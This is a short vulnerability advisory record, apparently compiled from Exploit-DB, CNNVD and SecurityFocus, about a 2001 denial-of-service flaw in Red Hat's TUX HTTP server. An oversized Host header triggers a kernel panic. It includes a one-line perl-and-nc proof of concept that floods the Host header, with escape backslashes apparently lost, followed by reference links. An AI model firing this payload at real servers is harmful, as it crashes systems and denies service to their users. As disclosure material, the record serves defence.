https://www.exploit-db.com/exploits/21141
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200112-024

RedHatLinux的TUXHTTPserver2.1.0-2版本存在漏洞。远程攻击者借助超长Host:header导致服务拒绝。

source: http://www.securityfocus.com/bid/3506/info

TUX is a kernel based HTTP server released under the GNU General Public License. It is able to serve static content, cache dynamic content, and coordinate with other HTTP servers to produce dynamic content.

An error exists when the TUX daemon received an oversized Host: header as part of a HTTP request. The request will result in an assertation failure and eventually in a kernel panic. At this point a system reboot will be required to regain normal functionality. 

perl -e "print qq(GET / HTTP/1.0nAccept: */*nHost: ) . qq(A) x 6000 .
qq(n)" |nc <ip address> <dest_port>

来源:marc.theaimsgroup.com
链接:http://marc.theaimsgroup.com/?l=tux-list&m;=100584714702328&w;=2
来源:BUGTRAQ
名称:20011105RHLinuxTuxHTTPDDoS
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=100498100112191&w;=2
来源:REDHAT
名称:RHSA-2001:142
链接:http://www.redhat.com/support/errata/RHSA-2001-142.html
来源:marc.theaimsgroup.com
链接:http://marc.theaimsgroup.com/?l=tux-list&m;=100584714702328&w;=2
来源:XF
名称:tux-http-host-dos(7464)
链接:http://xforce.iss.net/static/7464.php
来源:BID
名称:3506
链接:http://www.securityfocus.com/bid/3506